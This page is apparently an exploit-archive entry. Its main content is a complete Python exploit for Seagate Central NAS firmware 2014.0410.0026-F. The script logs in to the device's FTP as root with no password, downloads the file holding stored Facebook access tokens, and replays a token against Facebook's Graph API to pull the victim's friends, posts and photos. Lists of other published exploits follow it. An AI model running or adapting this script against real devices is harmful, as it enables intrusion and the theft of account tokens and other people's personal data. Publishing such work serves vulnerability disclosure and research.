Menu

Search for hundreds of thousands of exploits

"Seagate Central 2014.0410.0026-F - Remote Facebook Access Token"

Author

Exploit author

"Jeremy Brown"

Platform

Exploit platform

hardware

Release date

Exploit published date

2015-06-03

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
#!/usr/bin/python
# seagate_central_facebook.py
#
# Seagate Central Remote Facebook Access Token Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# May 2015
#
# -Synopsis-
#
# Seagate Central stores linked Facebook account access tokens in /etc/archive_accounts.ser
# and this exploit takes advantage of two bugs:
#
# 1) Passwordless root login via FTP to retrieve archive_accounts.ser file which contains access tokens
# 2) Reuses the unencrypted and unprotected (-rw-r--r--) access tokens for a chosen scope to return data
#
# -Example-
#
# > seagate_fb_accounts.py getaccesstoken 1.2.3.4
#
# 'archive_accounts.ser'
#
# a:1:{s:8:"facebook";a:1:{s:29:"user3535@facebook.com";a:5:{s:7:"service";s:8:"facebook";s:4:
# "user";s:29:"user3535@facebook.com";s:5:"owner";s:4:"test";s:6:"folder";s:7:"private";s:5:"t
# oken";s:186:"CAAxxxxxxxx..."
# ;}}}
#
# Next, try this:
#
# > seagate_fb_accounts.py CAAxxxxxxxx... friends
# server response:
#
# {'data': [{'name': 'Jessie Taylor', 'id': '100000937485968'}, {'name': 'Kellie Youty', 'id': '1
# 00000359801427'}, {'name': 'Hope Maynard', 'id': '10000102938470'}, {'name': 'Angel Tucker Pole', 'id'
# : '100001402808867'}, {'name': 'Malcolm Vance', 'id': '10000284629187'}, {'name': 'Tucker Civile', 'id':
# .....
#
# Scopes Reference: https://developers.facebook.com/docs/graph-api/reference/v2.1/user
#
# -Fixes-
#
# Seagate scheduled updates to go live on April 28th, 2015.
#
# Tested version: 2014.0410.0026-F
#

import sys
import json
from urllib import request # python3
from ftplib import FTP

fb_url = "https://graph.facebook.com"
fb_filename = "archive_accounts.ser"

def getaccesstoken(host):
    try:
        ftp = FTP(host)
        ftp.login("root")
        ftp.retrbinary("RETR " + "/etc/" + fb_filename, open(fb_filename, 'wb').write)
        ftp.close()
    
    except Exception as error:
        print("Error: %s" % error)
        return

    try:
        with open(fb_filename, 'r') as file:
            data = file.read()

    except Exception as error:
        print("Error: %s" % error)
        return

    print("\n'%s'\n\n%s\n\n" % (fb_filename, data))

    return

def main():
    if(len(sys.argv) < 2):
        print("Usage: %s <key> <scope> OR getaccesstoken <host>\n" % sys.argv[0])
        print("scopes: albums feed friends likes picture posts television")
        return

    if(sys.argv[1] == "getaccesstoken"):
        if(len(sys.argv) == 3):
            host = sys.argv[2]

            res = getaccesstoken(host)
        
        else:
            print("Error: need host to retrieve access token file\n")
            return

    else:
        key = sys.argv[1]
    
        if(len(sys.argv) == 3):
            scope = sys.argv[2]
        else:
            scope = ""

        try:
            response = request.urlopen(fb_url + "/me/" + scope + "?access_token=" + key).read()

        except Exception as error:
            print("Error: %s" % error)
            return

        data = json.loads(response.decode('utf-8'))

        print("server response:\n\n%s\n" % data)

    return

if __name__ == "__main__":
    main()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-30 "ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure" webapps hardware "Zagros Bingol"
2020-11-30 "Intelbras Router RF 301K 1.1.2 - Authentication Bypass" webapps hardware "Kaio Amaral"
2020-11-27 "Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution" webapps hardware "Emre SUREN"
2020-11-24 "Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)" webapps hardware maj0rmil4d
2020-11-23 "TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass" webapps hardware malwrforensics
2020-11-19 "Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification" webapps hardware "Ricardo Longatto"
2020-11-19 "Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure" remote hardware "Nitesh Surana"
2020-11-16 "Cisco 7937G - DoS/Privilege Escalation" remote hardware "Cody Martin"
2020-11-13 "ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)" webapps hardware b1ack0wl
2020-11-13 "Citrix ADC NetScaler - Local File Inclusion (Metasploit)" webapps hardware "RAMELLA Sebastien"
Release Date Title Type Platform Author
2019-10-15 "Podman & Varlink 1.5.1 - Remote Code Execution" remote linux "Jeremy Brown"
2019-10-14 "Ajenti 2.1.31 - Remote Code Execution" webapps python "Jeremy Brown"
2016-12-06 "Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)" dos windows "Jeremy Brown"
2016-12-04 "BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Code Execution" remote hardware "Jeremy Brown"
2015-06-10 "Libmimedir - '.VCF' Memory Corruption (PoC)" dos linux "Jeremy Brown"
2015-06-03 "Seagate Central 2014.0410.0026-F - Remote Command Execution" remote hardware "Jeremy Brown"
2015-06-03 "Seagate Central 2014.0410.0026-F - Remote Facebook Access Token" webapps hardware "Jeremy Brown"
2015-05-20 "Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation" local windows "Jeremy Brown"
2015-01-28 "ClearSCADA - Remote Authentication Bypass" remote windows "Jeremy Brown"
2011-06-07 "IBM Tivoli Endpoint 4.1.1 - Remote SYSTEM" remote windows "Jeremy Brown"
2011-03-23 "Progea Movicon 11 - 'TCPUploadServer' Remote File System" remote windows "Jeremy Brown"
2011-03-23 "IGSS 8 ODBC Server - Multiple Remote Uninitialized Pointer Free Denial of Service Vulnerabilities" dos windows "Jeremy Brown"
2011-01-25 "Automated Solutions Modbus/TCP OPC Server - Remote Heap Corruption (PoC)" dos windows "Jeremy Brown"
2011-01-14 "Objectivity/DB - Lack of Authentication" dos windows "Jeremy Brown"
2010-12-18 "Ecava IntegraXor Remote - ActiveX Buffer Overflow (PoC)" dos windows "Jeremy Brown"
2010-09-16 "BACnet OPC Client - Local Buffer Overflow (1)" local windows "Jeremy Brown"
2009-12-12 "Mozilla Codesighs - Memory Corruption" local linux "Jeremy Brown"
2009-12-07 "gAlan 0.2.1 - Local Buffer Overflow (1)" local windows "Jeremy Brown"
2009-12-07 "Polipo 1.0.4 - Remote Memory Corruption (PoC)" dos linux "Jeremy Brown"
2009-11-16 "Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (1)" dos windows_x86 "Jeremy Brown"
2009-10-28 "Mozilla Firefox 3.5.3 - Local Download Manager Temp File Creation" local windows "Jeremy Brown"
2009-10-06 "Geany .18 - Local File Overwrite" local linux "Jeremy Brown"
2009-09-24 "Sun Solaris 10 RPC dmispd - Denial of Service" dos solaris "Jeremy Brown"
2009-09-09 "Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)" dos windows "Jeremy Brown"
2009-09-09 "Apple Safari 3.2.3 (Windows x86) - JavaScript 'eval' Remote Denial of Service" dos windows_x86 "Jeremy Brown"
2009-09-09 "GemStone/S 6.3.1 - 'stoned' Local Buffer Overflow" local linux "Jeremy Brown"
2009-07-21 "Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation" local windows "Jeremy Brown"
2009-05-07 "GrabIt 1.7.2x - NZB DTD Reference Buffer Overflow" local windows "Jeremy Brown"
2009-03-12 "POP Peeper 3.4.0.0 - Date Remote Buffer Overflow" remote windows "Jeremy Brown"
2009-02-27 "POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)" remote windows "Jeremy Brown" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected